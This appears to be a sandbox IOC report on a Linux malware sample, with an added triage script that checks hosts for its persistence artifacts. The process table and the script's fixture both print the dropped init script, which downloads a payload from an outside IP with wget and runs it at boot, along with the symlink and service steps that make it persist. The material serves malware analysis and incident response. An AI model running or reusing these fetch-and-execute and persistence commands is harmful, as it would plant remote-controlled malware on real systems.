IOC Report
newsample


Files

File Path | Type | Category | Malicious
newsample | ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped | initial sample | malicious
/etc/init.d/mybinary | POSIX shell script, ASCII text executable | dropped | malicious
/etc/init.d/sh | POSIX shell script, ASCII text executable | dropped | malicious
/etc/profile | ASCII text | dropped | malicious
/etc/rc.local | POSIX shell script, ASCII text executable | dropped | malicious
/boot/bootcmd | ASCII text | dropped | -
/etc/inittab | ASCII text | dropped | -
/etc/motd | ASCII text | dropped | -
/etc/systemd/system/custom.service | ASCII text | dropped | -
/memfd:snapd-env-generator (deleted) | ASCII text | dropped | -

Processes

Path | Cmdline | Malicious
/usr/bin/dash | - | -
/usr/bin/rm | rm -f /tmp/tmp.KGmKPPHcMf /tmp/tmp.6tfchMR5XJ /tmp/tmp.tFw6jbg2P6 | -
/usr/bin/dash | - | -
/usr/bin/cat | cat /tmp/tmp.KGmKPPHcMf | -
/usr/bin/dash | - | -
/usr/bin/head | head -n 10 | -
/usr/bin/dash | - | -
/usr/bin/tr | tr -d \\000-\\011\\013\\014\\016-\\037 | -
/usr/bin/dash | - | -
/usr/bin/cut | cut -c -80 | -
/usr/bin/dash | - | -
/usr/bin/cat | cat /tmp/tmp.KGmKPPHcMf | -
/usr/bin/dash | - | -
/usr/bin/head | head -n 10 | -
/usr/bin/dash | - | -
/usr/bin/tr | tr -d \\000-\\011\\013\\014\\016-\\037 | -
/usr/bin/dash | - | -
/usr/bin/cut | cut -c -80 | -
/usr/bin/dash | - | -
/usr/bin/rm | rm -f /tmp/tmp.KGmKPPHcMf /tmp/tmp.6tfchMR5XJ /tmp/tmp.tFw6jbg2P6 | -
/tmp/newsample | /tmp/newsample | -
/tmp/newsample | - | -
/tmp/newsample | - | -
/bin/sh | sh -c "systemctl enable custom.service >/dev/null 2>&1" | -
/bin/sh | - | -
/usr/bin/systemctl | systemctl enable custom.service | -
/tmp/newsample | - | -
/bin/sh | sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1" | -
/bin/sh | - | -
/usr/bin/chmod | chmod +x /etc/init.d/mybinary | -
/tmp/newsample | - | -
/bin/sh | sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1" | -
/bin/sh | - | -
/usr/bin/ln | ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary | -
/tmp/newsample | - | -
/bin/sh | sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh" | -
/tmp/newsample | - | -
/bin/sh | sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1" | -
/bin/sh | - | -
/usr/bin/chmod | chmod +x /etc/init.d/sh | -
/tmp/newsample | - | -
/bin/sh | sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1" | -
/bin/sh | - | -
/usr/bin/mkdir | mkdir -p /etc/rc.d | -
/tmp/newsample | - | -
/bin/sh | sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1" | -
/bin/sh | - | -
/usr/bin/ln | ln -s /etc/init.d/sh /etc/rc.d/S99sh | -
/tmp/newsample | - | -
/tmp/newsample | - | -
/tmp/newsample | - | -
/usr/lib/udisks2/udisksd | - | -
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 | -
/usr/libexec/gnome-session-binary | - | -
/bin/sh | /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping | -
/usr/libexec/gsd-housekeeping | /usr/libexec/gsd-housekeeping | -
/usr/lib/udisks2/udisksd | - | -
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 | -
/usr/lib/systemd/systemd | - | -
/usr/lib/systemd/system-environment-generators/snapd-env-generator | /usr/lib/systemd/system-environment-generators/snapd-env-generator | -
/usr/lib/udisks2/udisksd | - | -
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 | -
/usr/lib/udisks2/udisksd | - | -
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 | -
/usr/lib/udisks2/udisksd | - | -
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 | -
/usr/lib/udisks2/udisksd | - | -
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 | -
(58 further processes are omitted from this export.)

Note: the udisksd/dumpe2fs, gnome-session-binary/gsd-housekeeping and systemd/snapd-env-generator entries are routine background activity of the analysis VM's desktop session, not behaviour of the sample, and should not be turned into indicators. The sample's own activity is the sh -c chain: it enables custom.service, writes and chmods /etc/init.d/sh, and links both init scripts into /etc/rcS.d and a freshly created /etc/rc.d so they run at boot; the dropped /etc/init.d/sh fetches http://193.143.1.70/ into /tmp/lol.sh and executes it.
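The persistence chain above (init scripts, S99 symlinks, enabled unit, rewritten boot files) is what a responder needs to check for on other hosts. The following is an added host-triage script, not part of the sandbox report: it audits a root filesystem (a live host, or an image mounted under ROOT) for exactly the artifacts listed in the Files and Processes tables. Paths and the C2 host are taken from the report; the function names, the custom.service body and the contents of the fixture files are assumptions made for the example.

```shell
#!/bin/sh
# Added host-triage example; this is not part of the sandbox report.
# Audits a root filesystem (a live host, or an image mounted under ROOT)
# for the persistence artifacts recorded in the Files and Processes tables.
# Paths and the C2 host come from the report; the function names, the
# fixture contents and the custom.service body are assumptions.

C2_HOST='193.143.1.70'   # URLs table
STAGE2='/tmp/lol.sh'     # wget target in the dropped /etc/init.d/sh

# Print one "FOUND ..." line per artifact present under ROOT (default /).
audit_persistence() {
    root="${1:-/}"
    # SysV init scripts the sample dropped, and the S99 symlinks that start
    # them at boot. /etc/rcS.d runs on every boot before the runlevel;
    # /etc/rc.d is created by the sample itself (some embedded/BusyBox init
    # layouts consult it, Debian-style init does not).
    for f in etc/init.d/mybinary etc/init.d/sh; do
        [ -e "$root/$f" ] && echo "FOUND init script: /$f"
    done
    for l in etc/rcS.d/S99mybinary etc/rc.d/S99sh; do
        [ -L "$root/$l" ] && echo "FOUND rc symlink: /$l -> $(readlink "$root/$l")"
    done
    # Unit file enabled with 'systemctl enable custom.service'.
    [ -e "$root/etc/systemd/system/custom.service" ] &&
        echo "FOUND systemd unit: /etc/systemd/system/custom.service"
    # Boot-time files the sample rewrote. These exist on clean systems too,
    # so flag them only when they reference the C2 host or the stage-2 path.
    for f in etc/profile etc/rc.local boot/bootcmd etc/inittab etc/motd; do
        [ -f "$root/$f" ] && grep -qF -e "$C2_HOST" -e "$STAGE2" "$root/$f" &&
            echo "FOUND modified boot file: /$f"
    done
    return 0
}

# Number of findings for ROOT; what a responder (or the test) checks.
count_hits() {
    audit_persistence "$1" | grep -c '^FOUND' || true
}

# Constructed fixture reproducing the report's drop set, so the audit can be
# exercised offline. /etc/init.d/sh is the script the echo command in the
# Processes table writes (that cmdline is double-quoted, so $0/$1 may have
# been expanded by the inner shell on the real victim); the other contents
# are placeholders, since the report shows only the files' types.
build_infected_root() {
    r="$1"
    mkdir -p "$r/etc/init.d" "$r/etc/rcS.d" "$r/etc/rc.d" \
             "$r/etc/systemd/system" "$r/boot"
    cat > "$r/etc/init.d/sh" <<'EOF'
#!/bin/sh
# /etc/init.d/sh

case "$1" in
 start)
 echo 'Starting sh'
 /bin/sh &
 wget http://193.143.1.70/ -O /tmp/lol.sh
 chmod +x /tmp/lol.sh
 /tmp/lol.sh &
 ;;
 stop)
 echo 'Stopping sh'
 killall sh
 ;;
 restart)
 $0 stop
 $0 start
 ;;
 *)
 echo "Usage: $0 {start|stop|restart}"
 exit 1
 ;;
esac
exit 0
EOF
    printf '#!/bin/sh\n# placeholder for the dropped mybinary init script\n' \
        > "$r/etc/init.d/mybinary"
    chmod +x "$r/etc/init.d/sh" "$r/etc/init.d/mybinary"
    ln -s /etc/init.d/mybinary "$r/etc/rcS.d/S99mybinary"
    ln -s /etc/init.d/sh "$r/etc/rc.d/S99sh"
    printf '[Service]\nExecStart=/tmp/newsample\n[Install]\nWantedBy=multi-user.target\n' \
        > "$r/etc/systemd/system/custom.service"   # body assumed
    for f in etc/profile etc/rc.local boot/bootcmd etc/inittab etc/motd; do
        printf 'wget http://%s/curl.sh -O %s && sh %s\n' \
            "$C2_HOST" "$STAGE2" "$STAGE2" > "$r/$f"   # content assumed
    done
}

# A clean root with an ordinary /etc/profile, to show the content check
# does not flag untouched boot files.
build_clean_root() {
    mkdir -p "$1/etc"
    printf '# /etc/profile: system-wide .profile for sh(1)\nexport PATH\n' > "$1/etc/profile"
}

INFECTED=$(mktemp -d); build_infected_root "$INFECTED"
CLEAN=$(mktemp -d);    build_clean_root "$CLEAN"
audit_persistence "$INFECTED"          # ten FOUND lines
echo "findings: infected=$(count_hits "$INFECTED") clean=$(count_hits "$CLEAN")"
```

Run it as root against a live system with `audit_persistence /`, or against a mounted forensic image with `audit_persistence /mnt/image`. The content check on the boot files is deliberately narrow (the C2 host and /tmp/lol.sh only); a host where the operator has already rotated the download URL will need the strings extended from the newer sample.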

URLs

Name | IP | Malicious
http://193.143.1.70/curl.sh | unknown | -
http://193.143.1.70/lol.sh | unknown | -
http://193.143.1.70/ | unknown | -

IPs

IP | Domain | Country | Malicious
152.185.199.77 | unknown | United States | -
223.253.184.139 | unknown | Korea Republic of | -
164.202.209.137 | unknown | United States | -
34.19.143.62 | unknown | United States | -
119.138.255.18 | unknown | China | -
180.35.209.103 | unknown | Japan | -
154.101.102.83 | unknown | Sudan | -
215.130.183.33 | unknown | United States | -
5.236.182.131 | unknown | Iran (ISLAMIC Republic Of) | -
154.148.133.157 | unknown | Morocco | -
94.117.70.188 | unknown | United Kingdom | -
90.65.173.120 | unknown | France | -
213.235.50.149 | unknown | United Kingdom | -
120.171.147.81 | unknown | Indonesia | -
85.169.87.156 | unknown | France | -
199.225.18.193 | unknown | United States | -
20.210.129.227 | unknown | United States | -
150.95.8.77 | unknown | Japan | -
144.68.44.153 | unknown | United States | -
3.130.88.199 | unknown | United States | -
55.165.247.42 | unknown | United States | -
211.127.6.115 | unknown | Japan | -
191.144.172.119 | unknown | Colombia | -
22.197.33.213 | unknown | United States | -
94.221.110.100 | unknown | Germany | -
56.22.8.176 | unknown | United States | -
117.171.247.195 | unknown | China | -
119.196.220.220 | unknown | Korea Republic of | -
91.53.28.185 | unknown | Germany | -
179.176.176.2 | unknown | Brazil | -
169.57.96.44 | unknown | United States | -
28.171.142.137 | unknown | United States | -
5.154.251.104 | unknown | Bosnia and Herzegowina | -
140.112.92.115 | unknown | Taiwan; Republic of China (ROC) | -
143.145.38.253 | unknown | United States | -
74.176.24.28 | unknown | United States | -
69.157.113.93 | unknown | Canada | -
44.20.251.177 | unknown | United States | -
57.218.165.195 | unknown | Belgium | -
203.134.152.137 | unknown | Australia | -
18.65.9.143 | unknown | United States | -
179.68.200.22 | unknown | Brazil | -
94.35.212.79 | unknown | Italy | -
150.82.235.196 | unknown | Japan | -
102.138.138.72 | unknown | Cote D'ivoire | -
177.66.61.120 | unknown | Brazil | -
186.102.79.41 | unknown | Colombia | -
96.26.148.92 | unknown | United States | -
68.47.215.40 | unknown | United States | -
110.18.232.150 | unknown | China | -
69.18.88.225 | unknown | United States | -
206.208.101.136 | unknown | United States | -
93.165.142.202 | unknown | Denmark | -
30.209.105.215 | unknown | United States | -
182.252.12.251 | unknown | Korea Republic of | -
110.147.110.39 | unknown | Australia | -
196.155.62.154 | unknown | Egypt | -
178.159.227.68 | unknown | Ukraine | -
89.93.74.133 | unknown | France | -
107.184.55.106 | unknown | United States | -
160.191.154.80 | unknown | unknown | -
154.143.192.224 | unknown | Egypt | -
8.74.174.44 | unknown | United States | -
157.0.52.5 | unknown | China | -
97.229.42.18 | unknown | United States | -
104.106.22.167 | unknown | United States | -
16.212.33.24 | unknown | United States | -
108.77.57.33 | unknown | United States | -
139.185.147.136 | unknown | United States | -
153.228.124.216 | unknown | Japan | -
51.75.77.30 | unknown | France | -
108.246.241.89 | unknown | United States | -
96.138.193.5 | unknown | United States | -
77.248.191.216 | unknown | Netherlands | -
41.41.25.158 | unknown | Egypt | -
159.73.68.124 | unknown | Australia | -
152.246.39.188 | unknown | Brazil | -
5.163.176.167 | unknown | Saudi Arabia | -
192.102.49.74 | unknown | Finland | -
70.18.20.73 | unknown | United States | -
220.10.163.191 | unknown | Japan | -
24.175.140.96 | unknown | United States | -
220.245.170.61 | unknown | Australia | -
174.205.7.155 | unknown | United States | -
50.106.16.204 | unknown | United States | -
98.5.16.226 | unknown | United States | -
120.250.83.195 | unknown | China | -
217.137.58.145 | unknown | United Kingdom | -
96.247.133.7 | unknown | United States | -
103.111.205.106 | unknown | Indonesia | -
121.13.148.230 | unknown | China | -
188.62.249.197 | unknown | Switzerland | -
165.110.176.46 | unknown | United States | -
54.101.96.96 | unknown | United States | -
3.221.126.11 | unknown | United States | -
187.177.161.126 | unknown | Mexico | -
109.90.116.213 | unknown | Germany | -
159.151.209.75 | unknown | France | -
202.96.65.115 | unknown | China | -
29.198.125.39 | unknown | United States | -
(90 further IPs are omitted from this export.)

Memdumps

Base Address | Regiontype | Protect | Malicious
418000 | - | page execute read | malicious
418000 | - | page execute read | malicious
518000 | - | page read and write | -
90d000 | - | page read and write | -
7ffe39ba8000 | - | page execute read | -
7ffe39a96000 | - | page read and write | -
913000 | - | page read and write | -
51b000 | - | page read and write | -
518000 | - | page read and write | -
7ffe39ba8000 | - | page execute read | -
90d000 | - | page read and write | -
51b000 | - | page read and write | -
7ffe39a96000 | - | page read and write | -
(3 further memdumps are omitted from this export.)